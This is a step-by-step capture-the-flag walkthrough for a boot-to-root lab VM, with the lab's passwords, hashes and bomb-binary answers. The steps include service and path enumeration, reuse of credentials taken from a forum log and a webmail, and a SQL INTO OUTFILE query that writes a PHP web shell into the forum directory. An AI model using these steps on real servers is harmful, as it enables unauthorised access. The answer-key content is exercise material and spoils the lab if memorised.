############################  BOOT 2 ROOT  #############################

# 1: Find IPv4 of guest VM
VBoxManage guestproperty get <VM-name> "/VirtualBox/GuestInfo/Net/0/V4/IP"

# 2: Found open doors
ssh, http, https, https://<vm-ip>/forum, https://<vm-ip>/phpmyadmin, ftp

# 3: In forum found some auth log with password of user inside
lmezard
!q\]Ej?*5K5cy*AJ

# 3bis: Found in profil of lmezard, her email : laurie@borntosec.net

# 4: Download dirsearch.py to find possible path to exploid
found : /cgi-bin
		/webmail
		/server-status

# 5: Go to /webmail and use forum credential form lmezard to access mailbox
Found mail with root access of database
root
Fg-'kKXBj87E:aJ$

# 6: With a dirseach.py find route with full access
found /forum/templates_c

# 7: With SQL request write php file to path in www-data default dir
SELECT <php-code> from INTO OUTFILE '/var/www/forum/templates_c/test.php'

# 8: Execute bash code in php file
ls -la
pwd

# 9: find which user have home directory
ls -la /home

# 10: Go to www-data home directory and get what it's here
ls -la /home/LOOKATME

# 11: Display file password 
lmezard:G!@M6f4Eatau{sF"

# 12: Connect to machine with credentials found

# 13: found fun archive in home directory move it to /tmp and untar it
mv fun /tmp
tar xvf /tmp/fun

# 14: Print all pcac file to assemble password
Iheartpwnage

# 15: Hash it (256)

# 16: Connect with laurie in ssh

# 17: start bomb excutable
Public speaking is very easy.
1 2 6 24 120 720
2 b 755
9
opekmq
4 2 6 1 3 5

# 18:
thor : Publicspeakingisveryeasy.126241207201b2149opekmq426135

# 19:
zaz : 646da671ca01bb5d84dbb5fb2238dc8e

